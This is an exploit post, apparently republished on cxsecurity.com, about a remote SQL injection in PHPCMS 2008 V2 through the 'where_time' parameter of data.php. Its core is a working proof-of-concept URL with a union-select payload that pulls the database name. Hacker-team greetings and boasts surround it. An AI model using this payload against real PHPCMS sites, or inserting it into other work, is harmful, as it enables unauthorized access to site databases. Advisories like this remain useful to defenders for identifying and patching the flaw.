PHPCMS 2008 SQL Injection

2011.01.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [~] Tybe: REMOTE SQL iNJECTioN [~] Vendor: www.phpcms.cn [+] Software: Phpcms 2008 V2 [+] author: ((R3d-D3v!L)) [~] [+] TEAM: Xp10_hACKEr & 403-T3AM [~] [?] contact: X[at]hotmail.co.jp [-] [?] Date: 17.jan.2011 [?] T!ME: 05:15 am GMT [?] Home: WwW.XP10.COM [^]&#169; Xp10_hAcKEr [?] ====================================================================================== # REMOTE SQL iNJECTioN Vulnerabilities ====================================================================================== [*] Err0r C0N50L3: http://127.0.0.1/path/data.php?action=get&where_time= EV!L INJECT!ON [*] prove of concept = http://127.0.0.1/path/data.php?action=get&where_time=-1+union+all+select+1,database()-- Already Tested on Win Xp [~]-----------------------------{((Xp10_hACkEr))}------------------------------------------------ # # [~] Greetz tO: [dolly &MERNA &po!S!ON Sc0rp!0N & ((hetlar jeddaH)) &(Nochelove) &emeliya & NEX ] # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers # # [?]spechial SupP0RT : MY M!ND # &#169; # [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) # # [~]spechial FR!ND: XP10.COM -_-_- lurklife.com # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]---------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top